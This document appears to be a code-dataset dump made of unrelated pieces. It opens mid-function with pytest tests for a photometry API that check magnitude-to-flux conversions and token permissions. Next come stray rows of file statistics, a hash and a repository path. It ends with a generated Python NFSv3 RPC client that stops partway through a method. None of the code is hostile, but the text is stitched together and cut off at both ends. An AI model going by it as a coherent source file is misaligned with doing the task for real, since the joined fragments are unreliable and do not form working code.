np.testing.assert_allclose(data['data']['fluxerr'], 0.2 / (2.5 / np.log(10)) * data['data']['flux'])
np.testing.assert_allclose(data['data']['zp'], 23.9)
def test_token_user_mixed_photometry_post(upload_data_token, public_source,
ztf_camera):
status, data = api('POST', 'photometry',
data={'obj_id': str(public_source.id),
'mjd': 58000.,
'instrument_id': ztf_camera.id,
'mag': 21.,
'magerr': [0.2, 0.1],
'limiting_mag': 22.3,
'magsys': 'ab',
'filter': 'ztfg'
},
token=upload_data_token)
assert status == 200
assert data['status'] == 'success'
photometry_id = data['data']['ids'][1]
status, data = api(
'GET',
f'photometry/{photometry_id}?format=flux',
token=upload_data_token)
assert status == 200
assert data['status'] == 'success'
np.testing.assert_allclose(data['data']['flux'],
10**(-0.4 * (21. - 23.9 )))
np.testing.assert_allclose(data['data']['fluxerr'],
0.1 / (2.5 / np.log(10)) * data['data']['flux'])
# should fail as len(mag) != len(magerr)
status, data = api('POST', 'photometry',
data={'obj_id': str(public_source.id),
'mjd': 58000.,
'instrument_id': ztf_camera.id,
'mag': [21.],
'magerr': [0.2, 0.1],
'limiting_mag': 22.3,
'magsys': 'ab',
'filter': 'ztfg'
},
token=upload_data_token)
assert status == 400
assert data['status'] == 'error'
def test_token_user_mixed_mag_none_photometry_post(upload_data_token, public_source,
ztf_camera):
status, data = api('POST', 'photometry',
data={'obj_id': str(public_source.id),
'mjd': 58000.,
'instrument_id': ztf_camera.id,
'mag': None,
'magerr': [0.2, 0.1],
'limiting_mag': 22.3,
'magsys': 'ab',
'filter': 'ztfg'
},
token=upload_data_token)
assert status == 400
assert data['status'] == 'error'
status, data = api('POST', 'photometry',
data={'obj_id': str(public_source.id),
'mjd': 58000.,
'instrument_id': ztf_camera.id,
'mag': [21.3, None],
'magerr': [0.2, 0.1],
'limiting_mag': 22.3,
'magsys': 'ab',
'filter': 'ztfg'
},
token=upload_data_token)
assert status == 400
assert data['status'] == 'error'
status, data = api('POST', 'photometry',
data={'obj_id': str(public_source.id),
'mjd': 58000.,
'instrument_id': ztf_camera.id,
'mag': [21.3, None],
'magerr': [None, 0.1],
'limiting_mag': 22.3,
'magsys': 'ab',
'filter': 'ztfg'
},
token=upload_data_token)
assert status == 400
assert data['status'] == 'error'
def test_token_user_post_photometry_limits(upload_data_token, public_source,
ztf_camera):
status, data = api('POST', 'photometry',
data={'obj_id': str(public_source.id),
'mjd': 58000.,
'instrument_id': ztf_camera.id,
'mag': None,
'magerr': None,
'limiting_mag': 22.3,
'magsys': 'ab',
'filter': 'ztfg'
},
token=upload_data_token)
assert status == 200
assert data['status'] == 'success'
photometry_id = data['data']['ids'][0]
status, data = api(
'GET',
f'photometry/{photometry_id}?format=flux',
token=upload_data_token)
assert status == 200
assert data['status'] == 'success'
assert data['data']['flux'] == None
np.testing.assert_allclose(data['data']['fluxerr'],
10**(-0.4 * (22.3 - 23.9)) / 5)
status, data = api('POST', 'photometry',
data={'obj_id': str(public_source.id),
'mjd': 58000.,
'instrument_id': ztf_camera.id,
'flux': None,
'fluxerr': 0.031,
'zp': 25.,
'magsys': 'ab',
'filter': 'ztfg'
},
token=upload_data_token)
assert status == 200
assert data['status'] == 'success'
photometry_id = data['data']['ids'][0]
status, data = api(
'GET',
f'photometry/{photometry_id}?format=flux',
token=upload_data_token)
assert status == 200
assert data['status'] == 'success'
assert data['data']['flux'] == None
np.testing.assert_allclose(data['data']['fluxerr'],
0.031 * 10**(-0.4 * (25. - 23.9)))
def test_token_user_post_invalid_filter(upload_data_token, public_source,
ztf_camera):
status, data = api('POST', 'photometry',
data={'obj_id': str(public_source.id),
'mjd': 58000.,
'instrument_id': ztf_camera.id,
'mag': None,
'magerr': None,
'limiting_mag': 22.3,
'magsys': 'ab',
'filter': 'bessellv'
},
token=upload_data_token)
assert status == 400
assert data['status'] == 'error'
def test_token_user_post_photometry_data_series(upload_data_token, public_source,
ztf_camera):
# valid request
status, data = api(
'POST',
'photometry',
data={'obj_id': str(public_source.id),
'mjd': [58000., 58001., 58002.],
'instrument_id': ztf_camera.id,
'flux': [12.24, 15.24, 12.24],
'fluxerr': [0.031, 0.029, 0.030],
'filter': ['ztfg', 'ztfg', 'ztfg'],
'zp': [25., 30., 21.2],
'magsys': ['ab', 'ab', 'ab'],
'ra': 264.1947917,
'dec': [50.5478333, 50.5478333 + 0.00001, 50.5478333],
'dec_unc': 0.2},
token=upload_data_token)
assert status == 200
assert data['status'] == 'success'
assert len(data['data']['ids']) == 3
photometry_id = data['data']['ids'][1]
status, data = api(
'GET',
f'photometry/{photometry_id}?format=flux',
token=upload_data_token)
assert status == 200
assert data['status'] == 'success'
assert np.allclose(data['data']['flux'],
15.24 * 10**(-0.4 * (30 - 23.9)))
assert np.allclose(data['data']['dec'],
50.5478333 + 0.00001)
assert np.allclose(data['data']['dec_unc'], 0.2)
assert data['data']['ra_unc'] is None
# invalid request
status, data = api(
'POST',
'photometry',
data=[{'obj_id': str(public_source.id),
'mjd': 58000,
'instrument_id': ztf_camera.id,
'flux': 12.24,
'fluxerr': 0.031,
'filter': 'ztfg',
'zp': 25.,
'magsys': 'ab'},
{'obj_id': str(public_source.id),
'mjd': 58001,
'instrument_id': ztf_camera.id,
'flux': 15.24,
'fluxerr': 0.031,
'filter': 'ztfg',
'zp': 30.,
'magsys': 'ab'},
{'obj_id': str(public_source.id),
'mjd': 58002,
'instrument_id': ztf_camera.id,
'flux': 12.24,
'fluxerr': 0.031,
'filter': 'ztfg',
'zp': 21.2,
'magsys': 'vega'}],
token=upload_data_token)
assert status == 400
assert data['status'] == 'error'
def test_post_photometry_no_access_token(view_only_token, public_source,
ztf_camera):
status, data = api('POST', 'photometry',
data={'obj_id': str(public_source.id),
'mjd': 58000.,
'instrument_id': ztf_camera.id,
'flux': 12.24,
'fluxerr': 0.031,
'zp': 25.,
'magsys': 'ab',
'filter': 'ztfg'
},
token=view_only_token)
assert status == 400
assert data['status'] == 'error'
def test_token_user_update_photometry(upload_data_token,
manage_sources_token,
public_source, ztf_camera):
status, data = api('POST', 'photometry',
data={'obj_id': str(public_source.id),
'mjd': 58000.,
'instrument_id': ztf_camera.id,
'flux': 12.24,
'fluxerr': 0.031,
'zp': 25.,
'magsys': 'ab',
'filter': 'ztfi'
},
token=upload_data_token)
assert status == 200
assert data['status'] == 'success'
photometry_id = data['data']['ids'][0]
status, data = api(
'GET',
f'photometry/{photometry_id}?format=flux',
token=upload_data_token)
assert status == 200
assert data['status'] == 'success'
np.testing.assert_allclose(data['data']['flux'],
12.24 * 10**(-0.4 * (25 - 23.9)))
status, data = api(
'PUT',
f'photometry/{photometry_id}',
data={'obj_id': str(public_source.id),
'flux': 11.0,
'mjd': 58000.,
'instrument_id': ztf_camera.id,
'fluxerr': 0.031,
'zp': 25.,
'magsys': 'ab',
'filter': 'ztfi'},
token=manage_sources_token)
assert status == 200
assert data['status'] == 'success'
status, data = api(
'GET',
f'photometry/{photometry_id}?format=flux',
token=upload_data_token)
np.testing.assert_allclose(data['data']['flux'],
11.0 * 10**(-0.4 * (25 - 23.9)))
def test_delete_photometry_data(upload_data_token, manage_sources_token,
public_source, ztf_camera):
status, data = api('POST', 'photometry',
data={'obj_id': str(public_source.id),
'mjd': 58000.,
'instrument_id': ztf_camera.id,
'flux': 12.24,
'fluxerr': 0.031,
'zp': 25.,
'magsys': 'ab',
'filter': 'ztfi'
},
token=upload_data_token)
assert status == 200
assert data['status'] == 'success'
photometry_id = data['data']['ids'][0]
status, data = api(
'GET',
f'photometry/{photometry_id}?format=flux',
token=upload_data_token)
assert status == 200
assert data['status'] == 'success'
np.testing.assert_allclose(data['data']['flux'],
12.24 * 10 ** (-0.4 * (25 - 23.9)))
status, data = api(
'DELETE',
f'photometry/{photometry_id}',
token=manage_sources_token)
assert status == 200
status, data = api(
'GET',
f'photometry/{photometry_id}?format=flux',
token=upload_data_token)
assert status == 400
def test_token_user_retrieving_source_photometry_and_convert(view_only_token, public_source):
status, data = api('GET', f'sources/{public_source.id}/photometry?format=flux&magsys=ab',
token=view_only_token)
assert status == 200
assert data['status'] == 'success'
assert isinstance(data['data'], list)
assert 'mjd' in data['data'][0]
assert 'ra_unc' in data['data'][0]
mag1_ab = -2.5 * np.log10(data['data'][0]['flux']) + data['data'][0]['zp']
magerr1_ab = 2.5 / np.log(10) * data['data'][0]['fluxerr']/ data['data'][0]['flux']
maglast_ab = -2.5 * np.log10(data['data'][-1]['flux']) + data['data'][-1]['zp']
magerrlast_ab = 2.5 / np.log(10) * data['data'][-1]['fluxerr']/ data['data'][-1]['flux']
status, data = api('GET', f'sources/{public_source.id}/photometry?format=mag&magsys=ab',
token=view_only_token)
assert status == 200
assert data['status'] == 'success'
assert np.allclose(mag1_ab, data['data'][0]['mag'])
assert np.allclose(magerr1_ab, data['data'][0]['magerr'])
assert np.allclose(maglast_ab, data['data'][-1]['mag'])
assert np.allclose(magerrlast_ab, data['data'][-1]['magerr'])
status, data = api('GET', f'sources/{public_source.id}/photometry?format=flux&magsys=vega',
token=view_only_token)
mag1_vega = -2.5 * np.log10(data['data'][0]['flux']) + data['data'][0]['zp']
magerr1_vega = 2.5 / np.log(10) * data['data'][0]['fluxerr']/ data['data'][0]['flux']
maglast_vega = -2.5 * np.log10(data['data'][-1]['flux']) + data['data'][-1]['zp']
magerrlast_vega = 2.5 / np.log(10) * data['data'][-1]['fluxerr']/ data['data'][-1]['flux']
assert status == 200
assert data['status'] == 'success'
ab = sncosmo.get_magsystem('ab')
vega = sncosmo.get_magsystem('vega')
vega_to_ab = {
filter: 2.5 * np.log10(ab.zpbandflux(filter) / vega.zpbandflux(filter))
for filter in ['ztfg', 'ztfr', 'ztfi']
}
assert np.allclose(mag1_ab, mag1_vega + vega_to_ab[data['data'][0]['filter']])
assert np.allclose(magerr1_ab, magerr1_vega)
assert np.allclose(maglast_ab, maglast_vega + vega_to_ab[data['data'][-1]['filter']])
assert np.allclose(magerrlast_ab, magerrlast_vega)
| 37.705983
| 104
| 0.4621
| 2,249
| 22,058
| 4.357937
| 0.056914
| 0.060402
| 0.064279
| 0.063259
| 0.90756
| 0.872972
| 0.854097
| 0.826242
| 0.811244
| 0.791756
| 0
| 0.054772
| 0.392465
| 22,058
| 584
| 105
| 37.770548
| 0.676591
| 0.003083
| 0
| 0.758691
| 0
| 0
| 0.155645
| 0.037751
| 0
| 0
| 0
| 0
| 0.237219
| 1
| 0.026585
| false
| 0
| 0.014315
| 0
| 0.0409
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7dd2bdc0ffd41f6e47e6df1b712d42877e74b38e
| 44,668
|
py
|
Python
|
src/goose_lang/examples/nfs_spec/symtest/rfc1813/client.py
|
herbelin/perennial
|
49b044fa83b4df2dc23262571e79c1165006bdc8
|
[
"MIT"
] | 73
|
2019-09-24T14:50:57.000Z
|
2022-03-25T02:01:55.000Z
|
src/goose_lang/examples/nfs_spec/symtest/rfc1813/client.py
|
herbelin/perennial
|
49b044fa83b4df2dc23262571e79c1165006bdc8
|
[
"MIT"
] | 39
|
2020-01-31T19:08:09.000Z
|
2022-01-14T15:46:56.000Z
|
src/goose_lang/examples/nfs_spec/symtest/rfc1813/client.py
|
herbelin/perennial
|
49b044fa83b4df2dc23262571e79c1165006bdc8
|
[
"MIT"
] | 17
|
2020-01-22T14:49:13.000Z
|
2021-11-26T18:38:48.000Z
|
# Generated by rpcgen.py from /home/nickolai/proj/go-rpcgen/rfc1813/prot.x on Fri Dec 6 10:47:13 2019
import rpc
import const
import pack
class NFS_PROGRAM(object):
class RawTCPNFS_V3(rpc.RawTCPClient):
def __init__(self, host, port, **kwargs):
if 'program' in kwargs or 'version' in kwargs:
raise TypeError('Unexpected keyword argument')
rpc.RawTCPClient.__init__(self, host, port, program=const.NFS_PROGRAM, version=const.NFS_V3, **kwargs)
# void NFSPROC3_NULL(void)
def NFSPROC3_NULL(self):
procedure_id = 0
self.call(procedure_id, '')
return None
# GETATTR3res NFSPROC3_GETATTR(GETATTR3args)
def NFSPROC3_GETATTR(self, p0):
procedure_id = 1
packer = pack.protPacker()
packer.pack_GETATTR3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_GETATTR3res()
unpacker.done()
return res
# SETATTR3res NFSPROC3_SETATTR(SETATTR3args)
def NFSPROC3_SETATTR(self, p0):
procedure_id = 2
packer = pack.protPacker()
packer.pack_SETATTR3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_SETATTR3res()
unpacker.done()
return res
# LOOKUP3res NFSPROC3_LOOKUP(LOOKUP3args)
def NFSPROC3_LOOKUP(self, p0):
procedure_id = 3
packer = pack.protPacker()
packer.pack_LOOKUP3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_LOOKUP3res()
unpacker.done()
return res
# ACCESS3res NFSPROC3_ACCESS(ACCESS3args)
def NFSPROC3_ACCESS(self, p0):
procedure_id = 4
packer = pack.protPacker()
packer.pack_ACCESS3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_ACCESS3res()
unpacker.done()
return res
# READLINK3res NFSPROC3_READLINK(READLINK3args)
def NFSPROC3_READLINK(self, p0):
procedure_id = 5
packer = pack.protPacker()
packer.pack_READLINK3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_READLINK3res()
unpacker.done()
return res
# READ3res NFSPROC3_READ(READ3args)
def NFSPROC3_READ(self, p0):
procedure_id = 6
packer = pack.protPacker()
packer.pack_READ3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_READ3res()
unpacker.done()
return res
# WRITE3res NFSPROC3_WRITE(WRITE3args)
def NFSPROC3_WRITE(self, p0):
procedure_id = 7
packer = pack.protPacker()
packer.pack_WRITE3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_WRITE3res()
unpacker.done()
return res
# CREATE3res NFSPROC3_CREATE(CREATE3args)
def NFSPROC3_CREATE(self, p0):
procedure_id = 8
packer = pack.protPacker()
packer.pack_CREATE3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_CREATE3res()
unpacker.done()
return res
# MKDIR3res NFSPROC3_MKDIR(MKDIR3args)
def NFSPROC3_MKDIR(self, p0):
procedure_id = 9
packer = pack.protPacker()
packer.pack_MKDIR3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_MKDIR3res()
unpacker.done()
return res
# SYMLINK3res NFSPROC3_SYMLINK(SYMLINK3args)
def NFSPROC3_SYMLINK(self, p0):
procedure_id = 10
packer = pack.protPacker()
packer.pack_SYMLINK3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_SYMLINK3res()
unpacker.done()
return res
# MKNOD3res NFSPROC3_MKNOD(MKNOD3args)
def NFSPROC3_MKNOD(self, p0):
procedure_id = 11
packer = pack.protPacker()
packer.pack_MKNOD3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_MKNOD3res()
unpacker.done()
return res
# REMOVE3res NFSPROC3_REMOVE(REMOVE3args)
def NFSPROC3_REMOVE(self, p0):
procedure_id = 12
packer = pack.protPacker()
packer.pack_REMOVE3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_REMOVE3res()
unpacker.done()
return res
# RMDIR3res NFSPROC3_RMDIR(RMDIR3args)
def NFSPROC3_RMDIR(self, p0):
procedure_id = 13
packer = pack.protPacker()
packer.pack_RMDIR3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_RMDIR3res()
unpacker.done()
return res
# RENAME3res NFSPROC3_RENAME(RENAME3args)
def NFSPROC3_RENAME(self, p0):
procedure_id = 14
packer = pack.protPacker()
packer.pack_RENAME3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_RENAME3res()
unpacker.done()
return res
# LINK3res NFSPROC3_LINK(LINK3args)
def NFSPROC3_LINK(self, p0):
procedure_id = 15
packer = pack.protPacker()
packer.pack_LINK3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_LINK3res()
unpacker.done()
return res
# READDIR3res NFSPROC3_READDIR(READDIR3args)
def NFSPROC3_READDIR(self, p0):
procedure_id = 16
packer = pack.protPacker()
packer.pack_READDIR3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_READDIR3res()
unpacker.done()
return res
# READDIRPLUS3res NFSPROC3_READDIRPLUS(READDIRPLUS3args)
def NFSPROC3_READDIRPLUS(self, p0):
procedure_id = 17
packer = pack.protPacker()
packer.pack_READDIRPLUS3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_READDIRPLUS3res()
unpacker.done()
return res
# FSSTAT3res NFSPROC3_FSSTAT(FSSTAT3args)
def NFSPROC3_FSSTAT(self, p0):
procedure_id = 18
packer = pack.protPacker()
packer.pack_FSSTAT3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_FSSTAT3res()
unpacker.done()
return res
# FSINFO3res NFSPROC3_FSINFO(FSINFO3args)
def NFSPROC3_FSINFO(self, p0):
procedure_id = 19
packer = pack.protPacker()
packer.pack_FSINFO3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_FSINFO3res()
unpacker.done()
return res
# PATHCONF3res NFSPROC3_PATHCONF(PATHCONF3args)
def NFSPROC3_PATHCONF(self, p0):
procedure_id = 20
packer = pack.protPacker()
packer.pack_PATHCONF3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_PATHCONF3res()
unpacker.done()
return res
# COMMIT3res NFSPROC3_COMMIT(COMMIT3args)
def NFSPROC3_COMMIT(self, p0):
procedure_id = 21
packer = pack.protPacker()
packer.pack_COMMIT3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_COMMIT3res()
unpacker.done()
return res
class TCPNFS_V3(rpc.TCPClient):
def __init__(self, host, **kwargs):
if 'program' in kwargs or 'version' in kwargs:
raise TypeError('Unexpected keyword argument')
rpc.TCPClient.__init__(self, host, program=const.NFS_PROGRAM, version=const.NFS_V3, **kwargs)
# void NFSPROC3_NULL(void)
def NFSPROC3_NULL(self):
procedure_id = 0
self.call(procedure_id, '')
return None
# GETATTR3res NFSPROC3_GETATTR(GETATTR3args)
def NFSPROC3_GETATTR(self, p0):
procedure_id = 1
packer = pack.protPacker()
packer.pack_GETATTR3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_GETATTR3res()
unpacker.done()
return res
# SETATTR3res NFSPROC3_SETATTR(SETATTR3args)
def NFSPROC3_SETATTR(self, p0):
procedure_id = 2
packer = pack.protPacker()
packer.pack_SETATTR3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_SETATTR3res()
unpacker.done()
return res
# LOOKUP3res NFSPROC3_LOOKUP(LOOKUP3args)
def NFSPROC3_LOOKUP(self, p0):
procedure_id = 3
packer = pack.protPacker()
packer.pack_LOOKUP3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_LOOKUP3res()
unpacker.done()
return res
# ACCESS3res NFSPROC3_ACCESS(ACCESS3args)
def NFSPROC3_ACCESS(self, p0):
procedure_id = 4
packer = pack.protPacker()
packer.pack_ACCESS3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_ACCESS3res()
unpacker.done()
return res
# READLINK3res NFSPROC3_READLINK(READLINK3args)
def NFSPROC3_READLINK(self, p0):
procedure_id = 5
packer = pack.protPacker()
packer.pack_READLINK3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_READLINK3res()
unpacker.done()
return res
# READ3res NFSPROC3_READ(READ3args)
def NFSPROC3_READ(self, p0):
procedure_id = 6
packer = pack.protPacker()
packer.pack_READ3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_READ3res()
unpacker.done()
return res
# WRITE3res NFSPROC3_WRITE(WRITE3args)
def NFSPROC3_WRITE(self, p0):
procedure_id = 7
packer = pack.protPacker()
packer.pack_WRITE3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_WRITE3res()
unpacker.done()
return res
# CREATE3res NFSPROC3_CREATE(CREATE3args)
def NFSPROC3_CREATE(self, p0):
procedure_id = 8
packer = pack.protPacker()
packer.pack_CREATE3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_CREATE3res()
unpacker.done()
return res
# MKDIR3res NFSPROC3_MKDIR(MKDIR3args)
def NFSPROC3_MKDIR(self, p0):
procedure_id = 9
packer = pack.protPacker()
packer.pack_MKDIR3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_MKDIR3res()
unpacker.done()
return res
# SYMLINK3res NFSPROC3_SYMLINK(SYMLINK3args)
def NFSPROC3_SYMLINK(self, p0):
procedure_id = 10
packer = pack.protPacker()
packer.pack_SYMLINK3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_SYMLINK3res()
unpacker.done()
return res
# MKNOD3res NFSPROC3_MKNOD(MKNOD3args)
def NFSPROC3_MKNOD(self, p0):
procedure_id = 11
packer = pack.protPacker()
packer.pack_MKNOD3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_MKNOD3res()
unpacker.done()
return res
# REMOVE3res NFSPROC3_REMOVE(REMOVE3args)
def NFSPROC3_REMOVE(self, p0):
procedure_id = 12
packer = pack.protPacker()
packer.pack_REMOVE3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_REMOVE3res()
unpacker.done()
return res
# RMDIR3res NFSPROC3_RMDIR(RMDIR3args)
def NFSPROC3_RMDIR(self, p0):
procedure_id = 13
packer = pack.protPacker()
packer.pack_RMDIR3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_RMDIR3res()
unpacker.done()
return res
# RENAME3res NFSPROC3_RENAME(RENAME3args)
def NFSPROC3_RENAME(self, p0):
procedure_id = 14
packer = pack.protPacker()
packer.pack_RENAME3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_RENAME3res()
unpacker.done()
return res
# LINK3res NFSPROC3_LINK(LINK3args)
def NFSPROC3_LINK(self, p0):
procedure_id = 15
packer = pack.protPacker()
packer.pack_LINK3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_LINK3res()
unpacker.done()
return res
# READDIR3res NFSPROC3_READDIR(READDIR3args)
def NFSPROC3_READDIR(self, p0):
procedure_id = 16
packer = pack.protPacker()
packer.pack_READDIR3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_READDIR3res()
unpacker.done()
return res
# READDIRPLUS3res NFSPROC3_READDIRPLUS(READDIRPLUS3args)
def NFSPROC3_READDIRPLUS(self, p0):
procedure_id = 17
packer = pack.protPacker()
packer.pack_READDIRPLUS3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_READDIRPLUS3res()
unpacker.done()
return res
# FSSTAT3res NFSPROC3_FSSTAT(FSSTAT3args)
def NFSPROC3_FSSTAT(self, p0):
procedure_id = 18
packer = pack.protPacker()
packer.pack_FSSTAT3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_FSSTAT3res()
unpacker.done()
return res
# FSINFO3res NFSPROC3_FSINFO(FSINFO3args)
def NFSPROC3_FSINFO(self, p0):
procedure_id = 19
packer = pack.protPacker()
packer.pack_FSINFO3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_FSINFO3res()
unpacker.done()
return res
# PATHCONF3res NFSPROC3_PATHCONF(PATHCONF3args)
def NFSPROC3_PATHCONF(self, p0):
procedure_id = 20
packer = pack.protPacker()
packer.pack_PATHCONF3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_PATHCONF3res()
unpacker.done()
return res
# COMMIT3res NFSPROC3_COMMIT(COMMIT3args)
def NFSPROC3_COMMIT(self, p0):
procedure_id = 21
packer = pack.protPacker()
packer.pack_COMMIT3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_COMMIT3res()
unpacker.done()
return res
class RawUDPNFS_V3(rpc.RawUDPClient):
def __init__(self, host, port, **kwargs):
if 'program' in kwargs or 'version' in kwargs:
raise TypeError('Unexpected keyword argument')
rpc.RawUDPClient.__init__(self, host, port, program=const.NFS_PROGRAM, version=const.NFS_V3, **kwargs)
# void NFSPROC3_NULL(void)
def NFSPROC3_NULL(self):
procedure_id = 0
self.call(procedure_id, '')
return None
# GETATTR3res NFSPROC3_GETATTR(GETATTR3args)
def NFSPROC3_GETATTR(self, p0):
procedure_id = 1
packer = pack.protPacker()
packer.pack_GETATTR3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_GETATTR3res()
unpacker.done()
return res
# SETATTR3res NFSPROC3_SETATTR(SETATTR3args)
def NFSPROC3_SETATTR(self, p0):
procedure_id = 2
packer = pack.protPacker()
packer.pack_SETATTR3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_SETATTR3res()
unpacker.done()
return res
# LOOKUP3res NFSPROC3_LOOKUP(LOOKUP3args)
def NFSPROC3_LOOKUP(self, p0):
procedure_id = 3
packer = pack.protPacker()
packer.pack_LOOKUP3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_LOOKUP3res()
unpacker.done()
return res
# ACCESS3res NFSPROC3_ACCESS(ACCESS3args)
def NFSPROC3_ACCESS(self, p0):
procedure_id = 4
packer = pack.protPacker()
packer.pack_ACCESS3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_ACCESS3res()
unpacker.done()
return res
# READLINK3res NFSPROC3_READLINK(READLINK3args)
def NFSPROC3_READLINK(self, p0):
procedure_id = 5
packer = pack.protPacker()
packer.pack_READLINK3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_READLINK3res()
unpacker.done()
return res
# READ3res NFSPROC3_READ(READ3args)
def NFSPROC3_READ(self, p0):
procedure_id = 6
packer = pack.protPacker()
packer.pack_READ3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_READ3res()
unpacker.done()
return res
# WRITE3res NFSPROC3_WRITE(WRITE3args)
def NFSPROC3_WRITE(self, p0):
procedure_id = 7
packer = pack.protPacker()
packer.pack_WRITE3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_WRITE3res()
unpacker.done()
return res
# CREATE3res NFSPROC3_CREATE(CREATE3args)
def NFSPROC3_CREATE(self, p0):
procedure_id = 8
packer = pack.protPacker()
packer.pack_CREATE3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_CREATE3res()
unpacker.done()
return res
# MKDIR3res NFSPROC3_MKDIR(MKDIR3args)
def NFSPROC3_MKDIR(self, p0):
procedure_id = 9
packer = pack.protPacker()
packer.pack_MKDIR3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_MKDIR3res()
unpacker.done()
return res
# SYMLINK3res NFSPROC3_SYMLINK(SYMLINK3args)
def NFSPROC3_SYMLINK(self, p0):
procedure_id = 10
packer = pack.protPacker()
packer.pack_SYMLINK3args(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_SYMLINK3res()
unpacker.done()
return res
# MKNOD3res NFSPROC3_MKNOD(MKNOD3args)
def NFSPROC3_MKNOD(self, p0):
procedure_id = 11
packer = pack.protPacker()
packer.pack_MKNOD3args(p0)
